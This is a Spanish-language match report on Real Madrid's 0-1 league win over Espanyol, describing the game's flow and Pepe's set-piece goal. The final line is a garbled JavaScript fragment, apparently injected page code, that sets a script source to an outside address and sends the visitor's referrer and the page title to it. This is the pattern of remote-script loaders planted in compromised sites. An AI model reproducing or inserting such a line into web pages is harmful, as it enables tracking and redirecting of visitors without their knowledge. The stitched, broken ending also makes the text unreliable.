Real Madrid se vuelve a subir al tren de la Liga

Minuto 91: Kelia Vidarte/LaTribunamadridista.com

Un Real Madrid ajustado festeja esta noche los tres puntos conseguidos, al ganar al Espanyol por 0-1, vuelve así a subirse al tren de la Liga, aprovechando el traspiés que sufrieron sus máximos rivales, FC Barcelona y Atlético de Madrid.

Los blancos empezaron un encuentro sin capacidad de construcción de juego en los primeros compases del partido, frente a un Espanyol que daba muestras de intensidad y presión a los hombres de Ancelotti. Un Real Madrid ausente y disperso fue protagonista de los primeros minutos,sin embargo los hombres de Javier Aguirre cometieron el error de no aprovechar las múltiples ocasiones y su ligero dominio.  Fue así como los merengues se sacaron su carta de la manga y utilizaron el efecto contragolpe, no fue la noche de Cristiano quien no acertaba en las jugadas, pero que avisaba que el Madrid estaba reaccionando y que en cualquier momento daría la sorpresa.

Los blancos dieron un paso al frente y a balón parado llegó el único y definitivo gol del encuentro de los pies de Pepe que apareció de forma inesperada con un remate  limpio, a partir de ahí el  brillo y frescura salió de los pies de Modric y Jesé que se encargaron de mantener el resultado de un equipo blanco carente. Un Espanyol entregado y un Madrid satisfecho hacen que con este resultado los blancos dependan de sí solos en la segunda mitad del campeonato.

s.src=’http:///?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;